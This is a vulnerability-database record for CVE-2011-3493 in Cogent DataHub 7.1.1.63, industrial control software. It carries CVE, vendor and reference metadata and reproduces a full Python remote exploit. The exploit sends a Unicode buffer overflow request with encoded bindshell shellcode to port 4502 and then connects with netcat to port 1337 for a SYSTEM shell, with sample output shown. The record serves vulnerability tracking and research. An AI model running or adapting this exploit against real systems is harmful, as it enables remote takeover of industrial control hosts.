ID
VAR-E-201109-0019
CVE
cve_id: | CVE-2011-3493 | Trust: 1.9 |
cve_id: | CVE-2011-3502 | Trust: 0.3 |
cve_id: | CVE-2011-3500 | Trust: 0.3 |
cve_id: | CVE-2011-3501 | Trust: 0.3 |
EDB ID
17884
TITLE
Cogent Datahub 7.1.1.63 - Remote Unicode Buffer Overflow - Windows remote Exploit
Trust: 0.6
DESCRIPTION
Cogent Datahub 7.1.1.63 - Remote Unicode Buffer Overflow. CVE-2011-3493CVE-75570 . remote exploit for Windows platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | cogent | model: | datahub | scope: | eq | version: | 7.1.1.63 | Trust: 1.0 |
vendor: | cogent | model: | real-time systems opc datahub | scope: | eq | version: | 6.0.2 | Trust: 0.6 |
vendor: | cogent | model: | real-time systems opc datahub | scope: | eq | version: | 6 | Trust: 0.6 |
vendor: | cogent | model: | real-time systems cogent datahub | scope: | eq | version: | 7.1.1.63 | Trust: 0.6 |
vendor: | cogent | model: | real-time systems cogent datahub | scope: | eq | version: | 7 | Trust: 0.6 |
vendor: | cogent | model: | real-time systems cascade datahub | scope: | eq | version: | 6 | Trust: 0.6 |
vendor: | cogent | model: | real-time systems opc datahub | scope: | ne | version: | 6.4.20 | Trust: 0.6 |
vendor: | cogent | model: | real-time systems cogent datahub | scope: | ne | version: | 7.1.2 | Trust: 0.6 |
vendor: | cogent | model: | real-time systems cascade datahub | scope: | ne | version: | 6.4.20 | Trust: 0.6 |
vendor: | cogent | model: | datahub | scope: | lte | version: | <=7.1.1.63 | Trust: 0.6 |
EXPLOIT
#!/usr/bin/python
#
# Cogent Datahub <= v7.1.1.63 Remote Unicode Buffer Overflow Exploit
# tested on:
# - windows server 2003
# - windows XP sp3
# questions >> @net__ninja || @luigi_auriemma
# example usage:
# [mr_me@neptune cognet]$ ./cognet_overflow.py 192.168.114.130
#
# -----------------------------------------------------
# ------ Cogent Datahub Unicode Overflow Exploit ------
# ------------- Found by Luigi Auriemma ---------------
# --------- SYSTEM exploit by Steven Seeley -----------
#
# (+) Sending overflow...
# (+) Getting shell..
# Connection to 192.168.114.130 1337 port [tcp/menandmice-dns] succeeded!
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
# C:\Program Files\Cogent\Cogent DataHub\plugin\TCPMaster>whoami
# whoami
# nt authority\system
#
# C:\Program Files\Cogent\Cogent DataHub\plugin\TCPMaster>
import socket,time,sys,os
# bindshell on port 1337
shellcodez = ("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQA"
"IAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1"
"111AIAJQI1AYAZBABABABAB30APB944JBKLQZJKPMK8JYKOKOKOQPTK"
"2LMTMTDKOUOLTKCLKUT8M1JOTKPOLXTKQOMPM1JKOY4KNTTKM1JNNQ9"
"04Y6LU4I0D4M77QHJLMKQ92ZKL4OK0TMTO8BUIUTK1OO4KQZK1VDKLL"
"PKTKQOMLM1ZKM3NLTKU9RLMTMLQQ7SNQ9KQTTK0CNP4KOPLL4KRPMLV"
"M4KOPLHQN384NPNLNJLPPKOJ6QVPSQVQX03OBRHT7RSNR1OB4KO8PBH"
"XKZMKLOKR0KOHVQOU9YU1VE1JMM8KRB5QZLBKOXPBH8YM9JUFMQGKOZ"
"6PSPSR30SQCPC23PCPSKOXPC6RHKUP936PSSYYQV5QX5TMJ40GWPWKO"
"8VRJLPR1R5KOHPQXG4VMNNIY0WKOZ6QC25KOXPBH9U19U6OY27KO9FP"
"PR4R41EKOXPUC1X9W49GVRYPWKO8V0UKOXP1VQZRD2FQXQSBMU9YUQZ"
"0PPYNI8LTI9W2J14U9K201GPKCUZKNORNMKNPBNL63TM2ZNXVKFK6KQ"
"XBRKNVSN6KOT5Q4KOIFQK0WB2PQ0Q0Q1ZM1PQR1PUR1KOXPRHVMJ9KU"
"8NQCKOHVQZKOKO07KOZ0DK0WKLTCWTRDKOHV0RKO8P38JPTJKTQOR3K"
"O8VKO8PKZA")
align= ""
align += "\x54" # push esp
align += "\x6f"
align += "\x58" # pop eax
align += "\x6f"
align += "\x05\x6f\x11" # add eax,11006f00
align += "\x6f"
align += "\x2d\x37\x01" # sub eax,01003700
align += "\x6f"
align += "\x2d\x37\x10" # sub eax,11003700
align += "\x6f"
align += "\x50" # push eax
align += "\x6f"
align += "\x48" # dec eax
align += "\x6f"
align += "\x48" # dec eax
align += "\x6f"
align += "\x55" # push ebp
align += "\x6f"
align += "\x59" # pop ecx
align += "\x08" # add [eax],cl (carve a 'RETN' onto the stack)
align += "\x6f"
align += "\x40" # inc eax
align += "\x6f"
align += "\x40" # inc eax
align += "\x6f\x41" * (48) # inc ecx (will not effect to our payload)
align += "\x6f"
align += "\x62" # becomes our carved RETN on the stack (0x61+0x62=0xc3)
request = "(domain \""
request += "\x61" * 1019
request += "\x7f\x55" # jmp esp 0x0055007f
request += align
request += shellcodez
request += "\")\r\n"
def banner():
banner = "\n-----------------------------------------------------\n"
banner += "------ Cogent Datahub Unicode Overflow Exploit ------\n"
banner += "------------- Found by Luigi Auriemma ---------------\n"
banner += "--------- SYSTEM exploit by Steven Seeley -----------\n"
return banner
if len(sys.argv) < 2:
print banner()
print "(-) Usage: %s <target addr> " % sys.argv[0]
sys.exit(0)
target = sys.argv[1]
print banner()
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
s.connect((target,4502))
except:
print "[-] Connection to %s failed! % (target)"
sys.exit(0)
print "(+) Sending overflow..."
s.send(request)
s.recv(1024)
# wait for the target, sheesh.
time.sleep(2)
print "(+) Getting shell.."
os.system("nc -vv %s 1337" % target)
s.close()
Trust: 1.0
EXPLOIT LANGUAGE
py
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Remote Unicode Buffer Overflow
Trust: 1.0
CREDITS
mr_me
Trust: 0.6
EXTERNAL IDS
db: | NVD | id: | CVE-2011-3493 | Trust: 1.9 |
db: | EXPLOIT-DB | id: | 17884 | Trust: 1.6 |
db: | ICS CERT | id: | ICSA-11-280-01 | Trust: 0.6 |
db: | EDBNET | id: | 40399 | Trust: 0.6 |
db: | NVD | id: | CVE-2011-3502 | Trust: 0.3 |
db: | NVD | id: | CVE-2011-3500 | Trust: 0.3 |
db: | BID | id: | 49610 | Trust: 0.3 |
db: | NVD | id: | CVE-2011-3501 | Trust: 0.3 |
db: | BID | id: | 49611 | Trust: 0.3 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2011-3493 | Trust: 1.6 |
url: | http://www.cogentdatahub.com/products/cogent_datahub.html | Trust: 0.6 |
url: | http://www.us-cert.gov/control_systems/pdf/icsa-11-280-01.pdf | Trust: 0.6 |
url: | https://www.exploit-db.com/exploits/17884/ | Trust: 0.6 |
url: | http://aluigi.org/mytoolz/mydown.zip | Trust: 0.3 |
url: | http://aluigi.altervista.org/adv/cogent_1-adv.txt | Trust: 0.3 |
url: | http://aluigi.altervista.org/adv/cogent_3-adv.txt | Trust: 0.3 |
url: | http://aluigi.org/poc/cogent_3.dat | Trust: 0.3 |
url: | http://aluigi.org/poc/cogent_1.dat | Trust: 0.3 |
SOURCES
db: | BID | id: | 49610 |
db: | BID | id: | 49611 |
db: | EXPLOIT-DB | id: | 17884 |
db: | EDBNET | id: | 40399 |
LAST UPDATE DATE
2022-07-27T09:19:14.288000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 49610 | date: | 2011-10-11T16:20:00 |
db: | BID | id: | 49611 | date: | 2015-03-19T08:47:00 |
SOURCES RELEASE DATE
db: | BID | id: | 49610 | date: | 2011-09-13T00:00:00 |
db: | BID | id: | 49611 | date: | 2011-09-13T00:00:00 |
db: | EXPLOIT-DB | id: | 17884 | date: | 2011-09-22T00:00:00 |
db: | EDBNET | id: | 40399 | date: | 2011-09-22T00:00:00 |